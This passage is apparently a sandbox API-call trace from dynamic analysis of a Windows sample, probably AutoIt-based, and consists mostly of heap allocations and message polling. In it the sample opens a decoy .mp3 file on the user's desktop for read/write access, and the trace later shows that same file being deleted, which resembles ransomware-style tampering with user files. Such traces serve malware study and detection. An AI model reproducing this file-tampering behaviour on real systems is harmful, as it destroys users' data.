[0161.070] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0161.070] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.070] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0161.070] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0161.070] FreeLibrary (hLibModule=0x75c90000) returned 1 [0161.070] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.070] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.070] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.070] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0161.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.070] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.071] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0161.071] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.072] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\falabydgbqpgwn8jboac.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0161.072] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.072] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.072] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.072] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.072] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0161.072] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.072] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.073] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.073] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.073] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.073] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.073] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.073] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0161.073] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.073] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.073] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.074] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.074] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.074] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.074] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.074] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3", lpFilePart=0x0) returned 0x3e [0161.074] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa00b9030, ftCreationTime.dwHighDateTime=0x1d5d7c1, ftLastAccessTime.dwLowDateTime=0xa6ca5750, ftLastAccessTime.dwHighDateTime=0x1d5df94, ftLastWriteTime.dwLowDateTime=0x56f8720, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x2520, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="FAlaByDgBqpgWn8JbOac.mp3", cAlternateFileName="FALABY~1.MP3")) returned 0x90ae18 [0161.074] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\falabydgbqpgwn8jboac.mp3")) returned 1 [0161.076] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa00b9030, ftCreationTime.dwHighDateTime=0x1d5d7c1, ftLastAccessTime.dwLowDateTime=0xa6ca5750, ftLastAccessTime.dwHighDateTime=0x1d5df94, ftLastWriteTime.dwLowDateTime=0x56f8720, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x2520, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="FAlaByDgBqpgWn8JbOac.mp3", cAlternateFileName="FALABY~1.MP3")) returned 0 [0161.076] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0161.077] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0161.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0161.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0161.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0161.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0161.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0161.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0161.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0161.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0161.079] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0161.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0161.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0161.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0161.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0161.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0161.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0161.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0161.080] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0161.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0161.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b50 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0161.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0161.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0161.080] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0161.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0161.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0161.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0161.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0161.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0161.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0161.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0161.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0161.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0161.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0161.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0161.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0161.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0161.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0161.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.081] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.082] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0161.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0161.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0161.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0161.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0161.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) 